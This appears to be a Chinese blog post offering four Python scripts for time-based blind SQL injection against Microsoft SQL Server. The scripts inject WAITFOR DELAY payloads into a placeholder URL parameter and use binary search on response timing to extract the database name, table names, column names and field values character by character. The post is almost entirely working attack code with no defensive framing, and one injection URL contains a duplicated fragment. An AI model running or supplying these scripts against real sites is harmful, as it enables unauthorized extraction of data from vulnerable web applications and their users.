SQL server 时间盲注脚本

一、爆破当前数据库名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
databases = []
length = []


for l in range(1,50):
    lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select db_name())))>{0} waitfor delay ‘0:0:1‘ -- "
    lengthUrlFormat = lengthUrl.format(l)
    start_time0 = time.time()
    rsp0 = requests.get(lengthUrlFormat,headers=headers)
    if  time.time() - start_time0 < 2:
        length.append(l)
        print(‘ length is ‘ + str(l))
        break
    else:
        pass
print(length)


databasename = ‘‘
for i in range(1,length[0]+1):
    min_value = 48
    max_value = 122
    mid = (min_value + max_value) // 2
    while(min_value < max_value):
        url = "http://www.xxxx.com/id.aspx?classify=1.aspx?classify=1‘;if(ascii(substring((select db_name()),{0},1)))>{1} waitfor delay ‘0:0:1‘ --"
        urlformat = url.format(i,mid)
        start_time = time.time()
        rsp = requests.get(urlformat,headers=headers)
        if  time.time() - start_time > 2:
            min_value = mid + 1
        else:
            max_value = mid
            pass
        mid = (min_value+max_value)//2
    databasename+=chr(mid)
    print(databasename)
databases.append(databasename)
print(databases)

二、爆破表名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
#print(num)
num.pop()

for n in num:
    for l in range(1,50):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            #print(‘ length is ‘ + str(l))
            break
        else:
            pass
#print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),{1},1)))>{2} waitfor delay ‘0:0:1‘ --"
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        #print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
	print("第%d表名:%s"%(num[j],tables[j]))

三、爆破字段名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns  Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
print(num)
num.pop()

for n in num:
    for l in range(1,50):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘)))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            print(‘ length is ‘ + str(l))
            break
        else:
            pass
print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
    print("第%d列名:%s"%(num[j],tables[j]))

四、爆破字段值

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
print(num)
num.pop()

for n in num:
    for l in range(1,20):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            print(‘ length is ‘ + str(l))
            break
        else:
            pass
print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 Where Account not in (select top {0} 字段名 from DB..表名)),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
    print("第%d值:%s"%(num[j],tables[j]))

SQL server 时间盲注脚本

上一篇:webpack中的require.context


下一篇:CentOS7 Oracle19c rpm安装